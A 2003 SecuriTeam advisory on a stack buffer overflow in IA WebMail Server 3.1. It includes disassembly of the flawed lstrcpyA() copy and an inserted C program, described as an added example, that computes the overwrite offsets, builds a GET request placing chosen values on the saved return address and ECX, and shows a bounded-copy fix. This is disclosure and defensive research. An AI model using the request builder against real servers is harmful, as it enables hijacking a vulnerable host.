[NT] IA WebMail Server Buffer Overflow Vulnerability

From: SecuriTeam (support_at_securiteam.com)
Date: 11/04/03

    To: list@securiteam.com
    Date: 4 Nov 2003 11:44:30 +0200


    The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com

      IA WebMail Server Buffer Overflow Vulnerability
    ------------------------------------------------------------------------

    SUMMARY

    IA WebMail Server (http://www.tnsoft.com) combined with the IA
    eMailServer is "a powerful combination for remote access. The IA WebMail
    Server will work with any standard Web browser to allow users access to
    their email from anywhere on the Internet. Most mail client programs
    require that they be reconfigured each time they are used by a different
    user. This feature is a definite boon to any user who travels or works
    from outside the office on occasion".

    The WebMail Server contains a stack-based buffer overflow in its handling
    of the HTTP GET request. If the requested page name is 1044 bytes long,
    the saved return address on the stack is completely overwritten, and the
    instruction pointer is fully controlled when the function's 'retn'
    instruction executes. The same overwrite also gives control of the ECX
    register before the return.

    DETAILS

    Vulnerable systems:
     * IA WebMail Server version 3.1

    Vulnerable code:
    This section is added for researchers, to give them a head start in
    locating the vulnerable function. The overflow is caused by an unchecked
    call to lstrcpyA(): the request string is copied into a fixed-size stack
    buffer with no length check.

    A call is made from 0x0041B98C to the sub-procedure at 0x0041D850, which
    pushes the saved return address 0x0041B991 onto the stack.

    :0041B98A 8BCE mov ecx, esi
    :0041B98C E8BF1E0000 call 0041D850

    In the sub-procedure (0x0041D850), at 0x0041D8BB the address of lstrcpyA()
    is loaded from the import address table entry at 0x0042A0CC into EBP and
    then called through EBP, with the user-supplied string as the source and
    the stack buffer at [esp+30] as the destination. Nothing between the two
    checks the length of the source against the size of the buffer.

    :0041D8BB 8B2DCCA04200 mov ebp, dword ptr [0042A0CC] ; <- lstrcpyA()
    :0041D8C1 40 inc eax
    :0041D8C2 8D4C2430 lea ecx, dword ptr [esp+30]
    :0041D8C6 50 push eax ; <- User supplied data
    :0041D8C7 51 push ecx ; <- Unchecked buffer
    :0041D8C8 FFD5 call ebp ; <- Call lstrcpyA()

    Once the copy returns, the saved return address has already been
    overwritten; control is gained when the function's epilogue reaches its
    return instruction. Note that the epilogue below also reloads a dword from
    [esp+434] into ECX and writes it to fs:[0], the head of the SEH chain.
    That dword lives in the same overflowed stack region as the return
    address, which is why ECX (and the exception chain head) can be
    controlled as well.

    * Reference To: MFC42.Ordinal:0320, Ord:0320h
    :0041DC45 E8F2830000 Call 0042603C
    :0041DC4A 8B8C2434040000 mov ecx, dword ptr [esp+00000434]
    :0041DC51 5F pop edi
    :0041DC52 5E pop esi
    :0041DC53 5D pop ebp
    :0041DC54 33C0 xor eax, eax
    :0041DC56 64890D00000000 mov dword ptr fs:[00000000], ecx
    :0041DC5D 5B pop ebx
    :0041DC5E 81C430040000 add esp, 00000430
    :0041DC64 C3 ret ; <- Here we gain control of the EIP

    The altered saved return address is popped off the stack in place of the
    real one, and execution continues at the attacker-chosen address.
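    The following C program is an added example, not code from the advisory or
    from Peter Winter-Smith. It turns the frame layout visible in the listing
    above into checkable arithmetic: the copy destination at [esp+30], the four
    register pops and the 'add esp, 430' before 'ret', and the dword at
    [esp+434] that the epilogue restores into ECX and writes to fs:[0]. From
    those constants it derives the distance from the buffer to the saved return
    address (0x410, i.e. 1040 bytes, which is why a 1044-byte page name
    overwrites all four bytes of it) and to the ECX slot (0x404, 1028 bytes),
    builds a request of that shape with chosen values at those offsets, and
    shows the bounded copy that should have replaced the unchecked lstrcpyA()
    call. The request line format 'GET /<name> HTTP/1.0', the assumption that
    ESP is identical at the lstrcpyA() call site and in the epilogue, the
    1024-byte size of the local buffer used by the hardened copy, and the
    placeholder values 0x41424344 and 0x45464748 are all assumptions made for
    this example.

```c
/* Added example (not from the advisory): stack-frame arithmetic for the
 * IA WebMail overflow derived from the listing in the advisory, a request
 * builder that places chosen values at the offsets reaching the saved
 * return address and ECX, and a bounded replacement for the unchecked
 * lstrcpyA() call. The "GET /<name> HTTP/1.0" layout is an assumption. */
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Frame constants read off the disassembly: the copy destination is
 * [esp+0x30]; the epilogue pops edi/esi/ebp/ebx (4 registers * 4 bytes)
 * and then adds 0x430 to esp before 'ret'; the dword restored into ECX
 * and written to fs:[0] is read from [esp+0x434]. Assumes ESP is the same
 * at the lstrcpyA() call site and in the epilogue. */
#define BUF_OFF     0x30u
#define POPPED_REGS 4u
#define LOCALS      0x430u
#define ECX_SLOT    0x434u

/* Distance from the start of the destination buffer to the saved return
 * address that 'ret' pops: 0x10 + 0x430 - 0x30 = 0x410 = 1040 bytes. */
static unsigned offset_to_ret(void) {
    return POPPED_REGS * 4u + LOCALS - BUF_OFF;
}

/* Distance to the dword that 'mov ecx, [esp+434]' loads and then stores
 * to fs:[0]: 0x434 - 0x30 = 0x404 = 1028 bytes. */
static unsigned offset_to_ecx(void) {
    return ECX_SLOT - BUF_OFF;
}

static void put_le32(uint8_t *p, uint32_t v) {
    p[0] = (uint8_t)v;         p[1] = (uint8_t)(v >> 8);
    p[2] = (uint8_t)(v >> 16); p[3] = (uint8_t)(v >> 24);
}

/* Build the request with the 1044-byte page name the advisory describes:
 * ret_addr lands on the saved return address and ecx_val on the ECX slot.
 * Returns the total request length, or 0 if 'out' is too small. Neither
 * value may contain a NUL byte, since lstrcpyA() stops at the first one. */
static size_t build_request(uint8_t *out, size_t cap,
                            uint32_t ret_addr, uint32_t ecx_val) {
    static const char head[] = "GET /";
    static const char tail[] = " HTTP/1.0\r\n\r\n";
    const size_t name_len = offset_to_ret() + 4;            /* 1044 */
    const size_t need = (sizeof head - 1) + name_len + (sizeof tail - 1);
    if (cap < need) return 0;
    memcpy(out, head, sizeof head - 1);
    uint8_t *name = out + (sizeof head - 1);
    memset(name, 'A', name_len);                 /* filler up to the slots */
    put_le32(name + offset_to_ecx(), ecx_val);   /* -> ECX and fs:[0]      */
    put_le32(name + offset_to_ret(), ret_addr);  /* -> popped by 'ret'     */
    memcpy(name + name_len, tail, sizeof tail - 1);
    return need;
}

/* Bounded stand-in for the 'push eax; push ecx; call ebp' lstrcpyA():
 * refuses any source that would not fit, terminator included. */
static int safe_copy_path(char *dst, size_t dst_size, const char *src) {
    size_t n = strlen(src);
    if (dst_size == 0 || n >= dst_size) return -1;
    memcpy(dst, src, n + 1);
    return 0;
}

int main(void) {
    uint8_t req[2048];
    size_t len = build_request(req, sizeof req, 0x41424344u, 0x45464748u);
    printf("request: %zu bytes, return address at name offset %u, ECX at %u\n",
           len, offset_to_ret(), offset_to_ecx());

    /* The same 1044-byte name as a C string, fed to the bounded copy. */
    char name[1045];
    memset(name, 'A', sizeof name - 1);
    name[sizeof name - 1] = '\0';
    char local[1024];   /* assumed size of the real frame's local buffer */
    printf("bounded copy of 1044-byte name: %d (expect -1)\n",
           safe_copy_path(local, sizeof local, name));
    printf("bounded copy of \"index.html\": %d (expect 0)\n",
           safe_copy_path(local, sizeof local, "index.html"));
    return 0;
}
```

    The program does not touch the network and needs no Windows headers, so
    it can be compiled anywhere to sanity-check the offsets before a real test
    is pointed at a lab host. The two placed values must be NUL-free, because
    the copy that delivers them is an lstrcpyA() and stops at the first zero
    byte.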

    ADDITIONAL INFORMATION

    The original advisory can be found at:
    http://www.elitehaven.net/iawebmail.txt

    The information has been provided by Peter Winter-Smith
    (peter4020@hotmail.com).

    ========================================

    This bulletin is sent to members of the SecuriTeam mailing list.
    To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
    In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

    ====================
    ====================

    DISCLAIMER:
    The information in this bulletin is provided "AS IS" without warranty of any kind.
    In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.

